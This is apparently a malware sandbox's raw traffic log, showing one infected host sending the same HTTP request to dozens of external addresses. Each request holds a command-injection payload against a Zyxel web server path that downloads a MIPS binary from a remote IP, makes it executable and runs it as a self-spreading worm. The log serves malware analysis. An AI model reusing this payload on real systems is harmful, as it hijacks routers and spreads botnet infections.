                                                Jan 12, 2024 18:16:11.169418097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1495192.168.2.2359038154.32.90.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169450998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1496192.168.2.2357922202.226.90.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169492006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1497192.168.2.2337472158.212.196.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169540882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1498192.168.2.234910434.106.96.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169595003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1499192.168.2.2348804206.58.226.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169622898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1500192.168.2.234360896.16.125.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169670105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1501192.168.2.2356262100.154.81.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169704914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1502192.168.2.2352850130.246.8.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169749975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1503192.168.2.2339148117.182.153.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169775963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1504192.168.2.235949076.155.170.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169811010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1505192.168.2.2351604137.155.69.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169872999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1506192.168.2.2352658202.210.195.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169898033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1507192.168.2.2341520179.137.84.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169954062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1508192.168.2.2338470168.83.192.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169986963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1509192.168.2.2340022201.226.147.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170016050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1510192.168.2.234706432.23.151.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170047998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1511192.168.2.235935275.230.31.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170079947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1512192.168.2.2347274136.38.220.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170137882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1513192.168.2.2358492154.148.159.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170169115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1514192.168.2.233614668.133.144.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170185089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1515192.168.2.2355164219.231.237.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170242071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1516192.168.2.2333182164.252.164.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170277119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1517192.168.2.235130025.77.49.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170316935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1518192.168.2.235077689.1.63.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170332909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1519192.168.2.2349316110.83.170.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170381069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1520192.168.2.235197289.13.99.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170433998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1521192.168.2.234660435.54.120.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170483112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1522192.168.2.23556529.72.63.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170496941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1523192.168.2.235573696.154.16.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170547962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1524192.168.2.2344548182.118.136.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170598030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1525192.168.2.235506631.90.211.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170609951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1526192.168.2.236083086.208.153.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170654058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1527192.168.2.2344214144.11.128.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170686960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1528192.168.2.234494824.26.254.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170728922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1529192.168.2.235108897.125.184.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170778990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1530192.168.2.2347570142.200.253.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170798063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1531192.168.2.234881249.164.29.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170823097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1532192.168.2.234737268.113.237.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170866966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1533192.168.2.2338136154.15.81.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170903921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1534192.168.2.2338542136.203.64.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170948029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1535192.168.2.234130451.150.231.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.170980930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1536192.168.2.2338280190.110.110.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171025991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1537192.168.2.2344768120.100.6.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171057940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1538192.168.2.235996285.146.8.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171087980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1539192.168.2.236073086.50.64.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171133995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1540192.168.2.2348350190.89.220.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171158075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1541192.168.2.235646295.57.209.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171202898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1542192.168.2.2343514188.29.194.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171224117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1543192.168.2.235908466.9.108.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171248913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1544192.168.2.233931834.78.255.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171293974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1545192.168.2.2334504154.43.85.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171340942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1546192.168.2.233843427.50.246.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171376944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1547192.168.2.2334668110.56.38.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171416998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1548192.168.2.235443484.109.98.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171443939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1549192.168.2.235335279.101.25.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171509027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1550192.168.2.2345298115.122.89.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171520948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1551192.168.2.2349256186.4.20.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171559095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1552192.168.2.2351790139.119.80.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171603918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1553192.168.2.233712636.104.170.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171639919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1554192.168.2.2357530158.198.63.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171679020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1555192.168.2.2356074191.69.103.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171714067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1556192.168.2.2343794183.36.89.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171742916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1557192.168.2.2351418158.72.182.92443
                                                TimestampBytes transferredDirectionData
